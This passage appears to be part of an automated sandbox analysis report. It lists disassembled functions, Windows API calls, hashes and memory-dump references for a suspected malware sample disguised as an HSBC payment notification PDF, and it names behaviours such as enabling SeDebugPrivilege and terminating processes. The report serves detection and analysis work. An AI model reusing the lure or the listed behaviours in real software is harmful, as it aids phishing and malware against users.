                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                                                                                    • String ID: SeDebugPrivilege
                                                                                                                                                    • API String ID: 2533919879-2896544425
                                                                                                                                                    • Opcode ID: 1fbe102fe1978df8388a2962b1b00d0cd5216d5acde680508b8c4a8fc22a507b
                                                                                                                                                    • Instruction ID: ee7027a858fb35c2998370541a0cb7821fbd3e1ab4d9769570fd7f32c35e06b7
                                                                                                                                                    • Opcode Fuzzy Hash: 1fbe102fe1978df8388a2962b1b00d0cd5216d5acde680508b8c4a8fc22a507b
                                                                                                                                                    • Instruction Fuzzy Hash: E1419D712002009FDB10EF25DC95BAEB7A5AF44318F04856EF9069B3C2DB78AC09CB99
                                                                                                                                                    Function 00462F94 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 82windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • LoadIconW.USER32(00000000,00007F03), ref: 00463033
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: IconLoad
                                                                                                                                                    • String ID: blank$info$question$stop$warning
                                                                                                                                                    • API String ID: 2457776203-404129466
                                                                                                                                                    • Opcode ID: 55f9dc3ea46c5c896c834eceb9773494ed516fdc9e05eb433b65141dcb2bff31
                                                                                                                                                    • Instruction ID: 1734436af2ca56e59899cd3bdf017f39c547290e8d4403808a282f24c331c6a5
                                                                                                                                                    • Opcode Fuzzy Hash: 55f9dc3ea46c5c896c834eceb9773494ed516fdc9e05eb433b65141dcb2bff31
                                                                                                                                                    • Instruction Fuzzy Hash: F211F631348386BAE7249E55DC42DAF679C9F15365B20002FF90066281FAFC5E4956AE
                                                                                                                                                    Function 004642F8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00464312
                                                                                                                                                    • LoadStringW.USER32(00000000), ref: 00464319
                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0046432F
                                                                                                                                                    • LoadStringW.USER32(00000000), ref: 00464336
                                                                                                                                                    • _wprintf.LIBCMT ref: 0046435C
                                                                                                                                                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0046437A
                                                                                                                                                    Strings
                                                                                                                                                    • %s (%d) : ==> %s: %s %s, xrefs: 00464357
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: HandleLoadModuleString$Message_wprintf
                                                                                                                                                    • String ID: %s (%d) : ==> %s: %s %s
                                                                                                                                                    • API String ID: 3648134473-3128320259
                                                                                                                                                    • Opcode ID: 965032fae8988b6724a64616dd310853d65f609a359c49a1a2d3266552516382
                                                                                                                                                    • Instruction ID: 8e316eae760c98dab52acacd6546c6ae495e9062239688ff7a3f09ebd5f77a5e
                                                                                                                                                    • Opcode Fuzzy Hash: 965032fae8988b6724a64616dd310853d65f609a359c49a1a2d3266552516382
                                                                                                                                                    • Instruction Fuzzy Hash: CB0167F2900208BFD751AB90DD89EFB776CEB08301F5009B6BB45E2151FA785E894B79
                                                                                                                                                    Function 0048D43E Relevance: 12.3, APIs: 8, Instructions: 257windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623
                                                                                                                                                    • GetSystemMetrics.USER32(0000000F), ref: 0048D47C
                                                                                                                                                    • GetSystemMetrics.USER32(0000000F), ref: 0048D49C
                                                                                                                                                    • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 0048D6D7
                                                                                                                                                    • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0048D6F5
                                                                                                                                                    • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0048D716
                                                                                                                                                    • ShowWindow.USER32(00000003,00000000), ref: 0048D735
                                                                                                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 0048D75A
                                                                                                                                                    • DefDlgProcW.USER32(?,00000005,?,?), ref: 0048D77D
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1211466189-0
                                                                                                                                                    • Opcode ID: d3703f674391628daf823e2a44e71b595811e89c5d6afcb3d767f65da08f560a
                                                                                                                                                    • Instruction ID: 2f618d94a1d43a989375790be64f9a6bb81cc316bd664b93e4dd4f842dd9a18d
                                                                                                                                                    • Opcode Fuzzy Hash: d3703f674391628daf823e2a44e71b595811e89c5d6afcb3d767f65da08f560a
                                                                                                                                                    • Instruction Fuzzy Hash: 2EB1AE71901219EFDF14EF68C9857AE7BB1BF04701F08847AEC48AB295E738A950CB54
                                                                                                                                                    Function 00402A5B Relevance: 12.1, APIs: 8, Instructions: 129COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0043C1C7,00000004,00000000,00000000,00000000), ref: 00402ACF
                                                                                                                                                    • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,0043C1C7,00000004,00000000,00000000,00000000,000000FF), ref: 00402B17
                                                                                                                                                    • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,0043C1C7,00000004,00000000,00000000,00000000), ref: 0043C21A
                                                                                                                                                    • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0043C1C7,00000004,00000000,00000000,00000000), ref: 0043C286
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ShowWindow
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1268545403-0
                                                                                                                                                    • Opcode ID: 58d7e91fded017a6e0efb4e40d8d562d2957b08ffb939ead570b381b4f40fd88
                                                                                                                                                    • Instruction ID: 9bc26204a44dec3219c5fdbddb2daa96843464872a345c1f9b74dd9d2987fb79
                                                                                                                                                    • Opcode Fuzzy Hash: 58d7e91fded017a6e0efb4e40d8d562d2957b08ffb939ead570b381b4f40fd88
                                                                                                                                                    • Instruction Fuzzy Hash: 514111307046809ADF755B298ECCB6F7791AB45304F14887FE047B26E0CABDA846DB2D
                                                                                                                                                    Function 004670C6 Relevance: 12.1, APIs: 8, Instructions: 101fileCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • InterlockedExchange.KERNEL32(?,000001F5), ref: 004670DD
                                                                                                                                                      • Part of subcall function 00420DB6: std::exception::exception.LIBCMT ref: 00420DEC
                                                                                                                                                      • Part of subcall function 00420DB6: __CxxThrowException@8.LIBCMT ref: 00420E01
                                                                                                                                                    • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00467114
                                                                                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 00467130
                                                                                                                                                    • _memmove.LIBCMT ref: 0046717E
                                                                                                                                                    • _memmove.LIBCMT ref: 0046719B
                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 004671AA
                                                                                                                                                    • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 004671BF
                                                                                                                                                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 004671DE
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 256516436-0
                                                                                                                                                    • Opcode ID: 91fe55520eadb1a7270c94a8a07a9ee0fef937bad63877067fb5a25429b7f735
                                                                                                                                                    • Instruction ID: 188a4d0b29229593a2b146342a062b1bd5409cf6fda6c026f11dbcde1a99e618
                                                                                                                                                    • Opcode Fuzzy Hash: 91fe55520eadb1a7270c94a8a07a9ee0fef937bad63877067fb5a25429b7f735
                                                                                                                                                    • Instruction Fuzzy Hash: F131A131A00215EBCF00DFA5DC85AAFB7B8EF45714F1441BAF9049B246EB349E14CBA9
                                                                                                                                                    Function 004861D3 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 004861EB
                                                                                                                                                    • GetDC.USER32(00000000), ref: 004861F3
                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004861FE
                                                                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 0048620A
                                                                                                                                                    • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00486246
                                                                                                                                                    • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00486257
                                                                                                                                                    • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,0048902A,?,?,000000FF,00000000,?,000000FF,?), ref: 00486291
                                                                                                                                                    • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 004862B1
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3864802216-0
                                                                                                                                                    • Opcode ID: cf317ad195164d60a9274800805a8c3d798bcd83c3ff523b59fa5e1fadae3bb4
                                                                                                                                                    • Instruction ID: f4278305449edce2f76c410d332ec57268d6ee35a6a277c822a0a6189647fcfb
                                                                                                                                                    • Opcode Fuzzy Hash: cf317ad195164d60a9274800805a8c3d798bcd83c3ff523b59fa5e1fadae3bb4
                                                                                                                                                    • Instruction Fuzzy Hash: 46317172101210BFEB115F50DC4AFEB3BADEF49755F0540A9FE08AA291D6759C41CB68
                                                                                                                                                    Function 0046EB23 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 323COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
                                                                                                                                                      • Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC
                                                                                                                                                      • Part of subcall function 0041FC86: _wcscpy.LIBCMT ref: 0041FCA9
                                                                                                                                                    • _wcstok.LIBCMT ref: 0046EC94
                                                                                                                                                    • _wcscpy.LIBCMT ref: 0046ED23
                                                                                                                                                    • _memset.LIBCMT ref: 0046ED56
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                                                                                                                    • String ID: X
                                                                                                                                                    • API String ID: 774024439-3081909835
                                                                                                                                                    • Opcode ID: 5a493bde25eaa50a4205b4a7b6ef268e3949634531009b61581ff7284a2c8f1f
                                                                                                                                                    • Instruction ID: da02439699827519884de0a837ef4d7055a253f99ddb834d536b4edba3b8eab3
                                                                                                                                                    • Opcode Fuzzy Hash: 5a493bde25eaa50a4205b4a7b6ef268e3949634531009b61581ff7284a2c8f1f
                                                                                                                                                    • Instruction Fuzzy Hash: E1C161756083019FD714EF25D841A5AB7E4FF85318F10492EF899A72A2EB38EC45CB4B
                                                                                                                                                    Function 00476B03 Relevance: 10.8, APIs: 7, Instructions: 250networkCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • __WSAFDIsSet.WSOCK32(00000000,?), ref: 00476C00
                                                                                                                                                    • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00476C21
                                                                                                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00476C34
                                                                                                                                                    • htons.WSOCK32(?), ref: 00476CEA
                                                                                                                                                    • inet_ntoa.WSOCK32(?), ref: 00476CA7
                                                                                                                                                      • Part of subcall function 0045A7E9: _strlen.LIBCMT ref: 0045A7F3
                                                                                                                                                      • Part of subcall function 0045A7E9: _memmove.LIBCMT ref: 0045A815
                                                                                                                                                    • _strlen.LIBCMT ref: 00476D44
                                                                                                                                                    • _memmove.LIBCMT ref: 00476DAD
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3619996494-0
                                                                                                                                                    • Opcode ID: 0c021546857269730462b0aef7fbe808168544cd7cd5e6da4896c9d16d032430
                                                                                                                                                    • Instruction ID: ed0775ecea4f9d6c11d03e52ad69743ddbee2f845c96f8b55ead14f2c665c5c3
                                                                                                                                                    • Opcode Fuzzy Hash: 0c021546857269730462b0aef7fbe808168544cd7cd5e6da4896c9d16d032430
                                                                                                                                                    • Instruction Fuzzy Hash: 3081E971204700AFC710EB25CC81EABB7A9EF84718F10892EF559A72D2DB78ED05CB59
                                                                                                                                                    Function 00401424 Relevance: 10.7, APIs: 7, Instructions: 219COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 5023a88ac2a4e028a815ef4d4db6f605c18ba5c71fdc3231c60cda9a6e4bf417
                                                                                                                                                    • Instruction ID: a887e684d243743618d1057532b585a7ad503945d0d011121e70032f0d2e3d72
                                                                                                                                                    • Opcode Fuzzy Hash: 5023a88ac2a4e028a815ef4d4db6f605c18ba5c71fdc3231c60cda9a6e4bf417
                                                                                                                                                    • Instruction Fuzzy Hash: 85715F30900109EFDB04DF95CC89EBF7B75FF85314F14816AF915AA2A1C738AA51CBA9
                                                                                                                                                    Function 0048B351 Relevance: 10.7, APIs: 7, Instructions: 199windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • IsWindow.USER32(00A81188), ref: 0048B3EB
                                                                                                                                                    • IsWindowEnabled.USER32(00A81188), ref: 0048B3F7
                                                                                                                                                    • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0048B4DB
                                                                                                                                                    • SendMessageW.USER32(00A81188,000000B0,?,?), ref: 0048B512
                                                                                                                                                    • IsDlgButtonChecked.USER32(?,?), ref: 0048B54F
                                                                                                                                                    • GetWindowLongW.USER32(00A81188,000000EC), ref: 0048B571
                                                                                                                                                    • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0048B589
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 4072528602-0
                                                                                                                                                    • Opcode ID: af34dbccf799c1c6a714d1a93faded036c611a6d887c638bd2f6846a6a243747
                                                                                                                                                    • Instruction ID: 3cfba568ea5790526d5b286793119b4d477072028a14d6832b16bbf893ccb4d1
                                                                                                                                                    • Opcode Fuzzy Hash: af34dbccf799c1c6a714d1a93faded036c611a6d887c638bd2f6846a6a243747
                                                                                                                                                    • Instruction Fuzzy Hash: 9B71BF34601604EFDB21AF54CC95FBF7BA9EF09700F14486EE941973A2C739A891DB98
                                                                                                                                                    Function 0047F41E Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 177COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • _memset.LIBCMT ref: 0047F448
                                                                                                                                                    • _memset.LIBCMT ref: 0047F511
                                                                                                                                                    • ShellExecuteExW.SHELL32(?), ref: 0047F556
                                                                                                                                                      • Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
                                                                                                                                                      • Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC
                                                                                                                                                      • Part of subcall function 0041FC86: _wcscpy.LIBCMT ref: 0041FCA9
                                                                                                                                                    • GetProcessId.KERNEL32(00000000), ref: 0047F5CD
                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0047F5FC
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
